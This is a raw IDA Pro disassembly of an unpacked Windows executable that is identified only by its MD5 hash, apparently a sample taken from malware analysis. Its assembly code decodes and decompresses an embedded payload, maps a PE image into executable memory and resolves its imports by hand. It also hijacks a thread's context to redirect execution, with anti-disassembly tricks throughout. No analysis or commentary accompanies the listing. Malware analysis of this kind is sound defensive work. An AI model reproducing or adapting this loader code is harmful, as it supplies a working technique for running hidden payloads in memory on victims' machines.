;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 931F2C6FE86A7CBC03BA036A69BAECCA
; File Name : u:\work\931f2c6fe86a7cbc03ba036a69baecca_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000682 ( 1666.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_401453+F�p
; sub_401529+D�p
; DATA XREF: ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: .text:0040108F�p
; DATA XREF: .text:0040108F�r
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_401453+1A�p
; DATA XREF: sub_401453+1A�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401278+44�p
; sub_4014C1:loc_401506�p ...
; BOOL __stdcall GetThreadContext(HANDLE hThread,LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_401453+38�p
; DATA XREF: sub_401453+38�r
; HANDLE __stdcall HeapCreate(DWORD flOptions,SIZE_T dwInitialSize,SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_401095+F�p
; sub_401095+31�p ...
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: sub_4012FA+6�p
; sub_4012FA+12�p
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_401453+5B�p
; DATA XREF: sub_401453+5B�r
; BOOL __stdcall SetThreadContext(HANDLE hThread,const CONTEXT *lpContext)
extrn SetThreadContext:dword ; CODE XREF: sub_401453+4F�p
; DATA XREF: sub_401453+4F�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_401545+8�p
; DATA XREF: sub_401545+8�r
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: sub_401453+67�p
; DATA XREF: sub_401453+67�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_40116E+2B�p
; DATA XREF: sub_40116E+2B�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401034h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
lea eax, dword_4023C0
and eax, 0FFFF0000h
mov dword_4023C0, eax
xor esi, esi
call sub_401453
loc_401057: ; DATA XREF: sub_401453+3E�o
call sub_4014C1
call sub_4011DC
call sub_401095
push dword_4023E8
call sub_40116E
push eax ; lpStartAddress
push dword_4023E4
call sub_401278
call sub_4012FA
call loc_4012DF
call sub_401529
start endp
; ---------------------------------------------------------------------------
db 0C3h ; Ã
; ---------------------------------------------------------------------------
push 0
call ds:ExitProcess
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401095 proc near ; CODE XREF: start+21�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
mov eax, ebx
push eax ; dwMaximumSize
push eax ; dwInitialSize
push 1 ; flOptions
call ds:HeapCreate
mov hHeap, eax
push 0EA60h
push 8
push eax
call dword_40240C
mov dword_4023E8, eax
push ebx ; dwMaximumSize
push ebx ; dwInitialSize
push 1 ; flOptions
call ds:HeapCreate
mov dword_402400, eax
push 0C35000h
push 8
push eax
call dword_40240C
mov dword_4023D8, eax
call sub_401430
push 9
pop dword_4023E0
call sub_401313
mov [ebp+var_8], eax
push eax
call sub_4013CE
call sub_40140C
call sub_4013C0
loc_401109: ; CODE XREF: sub_401095+D4�j
mov edx, dword_4023D4
sub edx, dword_4023C4
cmp edx, dword_4023E0
jl short loc_40116B
call sub_401313
mov [ebp+var_4], eax
mov ebx, dword_4023DC
dec ebx
cmp eax, ebx
jle short loc_40113F
push [ebp+var_8]
call sub_4013CE
call sub_4013F6
jmp short loc_401147
; ---------------------------------------------------------------------------
loc_40113F: ; CODE XREF: sub_401095+99�j
push [ebp+var_4]
call sub_4013CE
loc_401147: ; CODE XREF: sub_401095+A8�j
call sub_40140C
call sub_4013C0
push [ebp+var_8]
call sub_4013CE
call sub_4013F6
call sub_40136B
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_401109
; ---------------------------------------------------------------------------
loc_40116B: ; CODE XREF: sub_401095+86�j
pop ebx
leave
retn
sub_401095 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40116E proc near ; CODE XREF: start+2C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
add ebx, [ebx+3Ch]
mov eax, [ebx+34h]
mov dword_4023E4, eax
movzx eax, byte ptr [ebx+6]
mov [ebp+var_4], eax
push 40h ; flProtect
push 3000h ; flAllocationType
push dword ptr [ebx+50h] ; dwSize
push dword ptr [ebx+34h] ; lpAddress
call ds:VirtualAlloc
mov esi, eax
push dword ptr [ebx+54h]
push [ebp+arg_0]
push esi
call sub_401262
lea edi, [ebx+0F8h]
loc_4011B3: ; CODE XREF: sub_40116E+60�j
mov eax, [ebp+arg_0]
add eax, [edi+14h]
mov ecx, esi
add ecx, [edi+0Ch]
push dword ptr [edi+10h]
push eax
push ecx
call sub_401262
add edi, 28h
dec [ebp+var_4]
jnz short loc_4011B3
mov eax, [ebx+28h]
add eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
sub_40116E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011DC proc near ; CODE XREF: start+1C�p
push ebp
mov ebp, esp
push esi
mov eax, dword_4023C0
add eax, 3000h
lea esi, [eax+88h]
mov ecx, [eax+74h]
mov dword_4023D0, ecx
shl ecx, 3
mov dword_4023D4, ecx
xor ecx, ecx
push ecx ; dwMaximumSize
push ecx ; dwInitialSize
push 1 ; flOptions
call ds:HeapCreate
mov dword_4023F0, eax
push dword_4023D0
push 8
push eax
call dword_40240C
mov dword_4023C8, eax
add eax, dword_4023D0
mov dword_4023CC, eax
push dword_4023D0
push esi
push dword_4023C8
call sub_401262
mov ebx, dword_4023C8
mov ecx, dword_4023D0
loc_401250: ; CODE XREF: sub_4011DC+79�j
sub byte ptr [ebx], 2Dh
inc ebx
dec ecx
jnz short loc_401250
add dword_4023C8, 3
pop esi
pop ebx
leave
retn
sub_4011DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401262 proc near ; CODE XREF: sub_40116E+3A�p
; sub_40116E+55�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
rep movsb
pop edi
pop esi
leave
retn 0Ch
sub_401262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401278 proc near ; CODE XREF: start+38�p
hModule = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4
push esi
push ebx
push edi
mov esi, [ebp+arg_0]
mov eax, esi
add eax, 3Ch
mov eax, [eax]
add eax, esi
add eax, 80h
mov ebx, [eax]
add ebx, esi
loc_401296: ; CODE XREF: sub_401278+5E�j
mov eax, [ebx+0Ch]
add eax, [ebp+arg_0]
push eax
call dword_402408
mov [ebp+hModule], eax
mov esi, [ebx]
add esi, [ebp+arg_0]
mov edi, [ebx+10h]
add edi, [ebp+arg_0]
loc_4012B1: ; CODE XREF: sub_401278+55�j
mov ecx, [esi]
add ecx, [ebp+arg_0]
inc ecx
inc ecx
push ecx ; lpProcName
push [ebp+hModule] ; hModule
call ds:GetProcAddress
mov [edi], eax
add esi, 4
add edi, 4
cmp dword ptr [esi], 0
jnz short loc_4012B1
add ebx, 14h
cmp dword ptr [ebx+0Ch], 0
jnz short loc_401296
pop edi
pop ebx
pop esi
leave
retn 4
sub_401278 endp
; ---------------------------------------------------------------------------
loc_4012DF: ; CODE XREF: start+42�p
push ebx
xor eax, eax
jz short near ptr loc_4012E4+1
loc_4012E4: ; CODE XREF: .text:004012E2�j
call near ptr 184D9E4Dh
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
mov ecx, [ecx+30h]
mov ebx, dword_4023E4
mov [ecx+8], ebx
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_4012FA proc near ; CODE XREF: start+3D�p
push hHeap ; hHeap
call ds:HeapDestroy
push dword_402400 ; hHeap
call ds:HeapDestroy
retn
sub_4012FA endp
; =============== S U B R O U T I N E =======================================
sub_401313 proc near ; CODE XREF: sub_401095+5C�p
; sub_401095+88�p
push esi
push ebx
push edi
xor edx, edx
mov ecx, 20h
push dword_4023C4
pop eax
push dword_4023C8
pop ebx
div ecx
shl eax, 2
add ebx, eax
mov edi, dword_4023E0
push edi
xor eax, eax
loc_40133B: ; CODE XREF: sub_401313+4B�j
dec edi
mov esi, [ebx]
bswap esi
mov cl, dl
shl esi, cl
shr esi, 1Fh
test esi, esi
jz short loc_401351
mov ecx, edi
shl esi, cl
add eax, esi
loc_401351: ; CODE XREF: sub_401313+36�j
inc edx
cmp edx, 20h
jnz short loc_40135C
add ebx, 4
xor edx, edx
loc_40135C: ; CODE XREF: sub_401313+42�j
test edi, edi
jnz short loc_40133B
pop ecx
add dword_4023C4, ecx
pop edi
pop ebx
pop esi
retn
sub_401313 endp
; =============== S U B R O U T I N E =======================================
sub_40136B proc near ; CODE XREF: sub_401095+C9�p
push ebx
mov eax, dword_4023DC
mov ebx, dword_4023D8
mov ecx, 0A0h
mul ecx
add ebx, eax
mov esi, offset dword_4022CC
movzx ecx, byte ptr [esi]
inc esi
mov [ebx], cl
inc ebx
mov edi, ebx
rep movsb
inc dword_4023DC
call sub_40139D
pop ebx
retn
sub_40136B endp
; =============== S U B R O U T I N E =======================================
sub_40139D proc near ; CODE XREF: sub_40136B+2B�p
mov edx, dword_4023DC
cmp edx, 200h
jnz short locret_4013BF
mov dword_4023DC, 100h
mov dword_4023E0, 9
locret_4013BF: ; CODE XREF: sub_40139D+C�j
retn
sub_40139D endp
; =============== S U B R O U T I N E =======================================
sub_4013C0 proc near ; CODE XREF: sub_401095+6F�p
; sub_401095+B7�p
mov ecx, offset dword_4022CC
inc ecx
mov al, [ecx]
mov byte_402410, al
retn
sub_4013C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013CE proc near ; CODE XREF: sub_401095+65�p
; sub_401095+9E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, offset dword_4022CC
mov eax, [ebp+arg_0]
mov ebx, dword_4023D8
mov ecx, 0A0h
mul ecx
add ebx, eax
movzx ecx, byte ptr [ebx]
inc ecx
mov esi, ebx
rep movsb
popa
leave
retn 4
sub_4013CE endp
; =============== S U B R O U T I N E =======================================
sub_4013F6 proc near ; CODE XREF: sub_401095+A3�p
; sub_401095+C4�p
push ebx
mov ebx, offset dword_4022CC
inc byte ptr [ebx]
movzx ecx, byte ptr [ebx]
add ebx, ecx
mov al, byte_402410
mov [ebx], al
pop ebx
retn
sub_4013F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40140C proc near ; CODE XREF: sub_401095+6A�p
; sub_401095:loc_401147�p
push ebp
mov ebp, esp
pusha
mov edi, dword_4023E8
add edi, dword_4023EC
mov esi, offset dword_4022CC
movzx ecx, byte ptr [esi]
add dword_4023EC, ecx
inc esi
rep movsb
popa
leave
retn
sub_40140C endp
; =============== S U B R O U T I N E =======================================
sub_401430 proc near ; CODE XREF: sub_401095+4F�p
push ebx
mov ebx, dword_4023D8
xor ecx, ecx
mov ch, 1
loc_40143B: ; CODE XREF: sub_401430+18�j
mov [ebx], ch
mov [ebx+1], cl
add ebx, 0A0h
inc cl
jnz short loc_40143B
mov dword_4023DC, ecx
nop
pop ebx
retn
sub_401430 endp
; =============== S U B R O U T I N E =======================================
sub_401453 proc near ; CODE XREF: start+12�p
push 0 ; lpThreadId
push 4 ; dwCreationFlags
push 0 ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
mov hThread, eax
call ds:GetCurrentThread
mov dword_4023F8, eax
lea esi, Context
mov dword ptr [esi], 10002h
push esi ; lpContext
push hThread ; hThread
call ds:GetThreadContext
mov dword ptr [esi+0B0h], offset loc_401057
push esi ; lpContext
push hThread ; hThread
call ds:SetThreadContext
push hThread ; hThread
call ds:ResumeThread
push dword_4023F8 ; hThread
call ds:SuspendThread
sub_401453 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION StartAddress. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014C1 proc near ; CODE XREF: start:loc_401057�p
push ebp
mov ebp, esp
mov eax, large fs:0
mov eax, [eax+4]
and eax, 0FFFF0000h
loc_4014D2: ; CODE XREF: sub_4014C1+1B�j
sub eax, 10000h
cmp word ptr [eax], 5A4Dh
jnz short loc_4014D2
lea ecx, word_4014EE
inc ecx
push ecx ; lpProcName
push eax ; hModule
mov hModule, eax
jmp short loc_401506
; ---------------------------------------------------------------------------
word_4014EE dw 4CDDh ; DATA XREF: sub_4014C1+1D�o
aOadlibrarya db 'oadLibraryA',0
; char ProcName[]
ProcName db 'HeapAlloc',0 ; DATA XREF: sub_4014C1+50�o
; ---------------------------------------------------------------------------
loc_401506: ; CODE XREF: sub_4014C1+2B�j
call ds:GetProcAddress
mov dword_402408, eax
push offset ProcName ; "HeapAlloc"
push hModule ; hModule
call ds:GetProcAddress
mov dword_40240C, eax
leave
retn
sub_4014C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; int __stdcall sub_401529(LPTHREAD_START_ROUTINE lpStartAddress)
sub_401529 proc near ; CODE XREF: start+47�p
lpStartAddress = dword ptr 8
push ebp
mov ebp, esp
xor eax, eax
push eax ; lpThreadId
push eax ; dwCreationFlags
push eax ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call ds:CreateThread
call sub_401545
sub_401529 endp
; ---------------------------------------------------------------------------
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_401545 proc near ; CODE XREF: sub_401529+13�p
push ebp
mov ebp, esp
loc_401548: ; CODE XREF: sub_401545+F�j
push 0FA0h ; dwMilliseconds
call ds:Sleep
nop
jmp short loc_401548
sub_401545 endp
; ---------------------------------------------------------------------------
leave
retn
; ---------------------------------------------------------------------------
dd 1580h, 2 dup(0)
dd 1674h, 1000h, 5 dup(0)
dd 15B4h, 15C4h, 15D2h, 15E6h, 15F8h, 160Ch, 161Ah, 1628h
dd 1638h, 164Ch, 1654h, 1664h, 0
dd 72430048h, 65746165h, 65726854h, 6461h, 78450075h, 72507469h
dd 7365636Fh, 0E50073h, 43746547h, 65727275h, 6854746Eh
dd 64616572h, 1290000h, 50746547h, 41636F72h, 65726464h
dd 7373h, 65470152h, 72685474h, 43646165h, 65746E6Fh, 7478h
dd 65480182h, 72437061h, 65746165h, 1840000h, 70616548h
dd 74736544h, 796F72h, 6552020Fh, 656D7573h, 65726854h
dd 6461h, 65530263h, 72685474h, 43646165h, 65746E6Fh, 7478h
dd 6C530273h, 706565h, 75530275h, 6E657073h, 72685464h
dd 646165h, 69560295h, 61757472h, 6C6C416Ch, 636Fh, 4E52454Bh
dd 32334C45h, 6C6C642Eh, 60h dup(0)
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 00000411 ( 1041.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
; CONTEXT Context
Context CONTEXT <?> ; DATA XREF: sub_401453+25�o
dword_4022CC dd 3Dh dup(?) ; DATA XREF: sub_40136B+15�o
; sub_4013C0�o ...
dword_4023C0 dd ? ; DATA XREF: start�o start+B�w ...
dword_4023C4 dd ? ; DATA XREF: sub_401095+7A�r
; sub_401313+A�r ...
dword_4023C8 dd ? ; DATA XREF: sub_4011DC+46�w
; sub_4011DC+5D�r ...
dword_4023CC dd ? ; DATA XREF: sub_4011DC+51�w
dword_4023D0 dd ? ; DATA XREF: sub_4011DC+17�w
; sub_4011DC+37�r ...
dword_4023D4 dd ? ; DATA XREF: sub_401095:loc_401109�r
; sub_4011DC+20�w
dword_4023D8 dd ? ; DATA XREF: sub_401095+4A�w
; sub_40136B+6�r ...
dword_4023DC dd ? ; DATA XREF: sub_401095+90�r
; sub_40136B+1�r ...
dword_4023E0 dd ? ; DATA XREF: sub_401095+56�w
; sub_401095+80�r ...
dword_4023E4 dd ? ; DATA XREF: start+32�r sub_40116E+12�w ...
dword_4023E8 dd ? ; DATA XREF: start+26�r sub_401095+28�w ...
dword_4023EC dd ? ; DATA XREF: sub_40140C+A�r
; sub_40140C+18�w
dword_4023F0 dd ? ; DATA XREF: sub_4011DC+32�w
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_401095+15�w
; sub_4012FA�r
; HANDLE dword_4023F8
dword_4023F8 dd ? ; DATA XREF: sub_401453+20�w
; sub_401453+61�r
; HANDLE hThread
hThread dd ? ; DATA XREF: sub_401453+15�w
; sub_401453+32�r ...
; HANDLE dword_402400
dword_402400 dd ? ; DATA XREF: sub_401095+37�w
; sub_4012FA+C�r
; HMODULE hModule
hModule dd ? ; DATA XREF: sub_4014C1+26�w
; sub_4014C1+55�r
dword_402408 dd ? ; DATA XREF: sub_401278+25�r
; sub_4014C1+4B�w
dword_40240C dd ? ; DATA XREF: sub_401095+22�r
; sub_401095+44�r ...
byte_402410 db ? ; DATA XREF: sub_4013C0+8�w
; sub_4013F6+D�r
_data ends
end start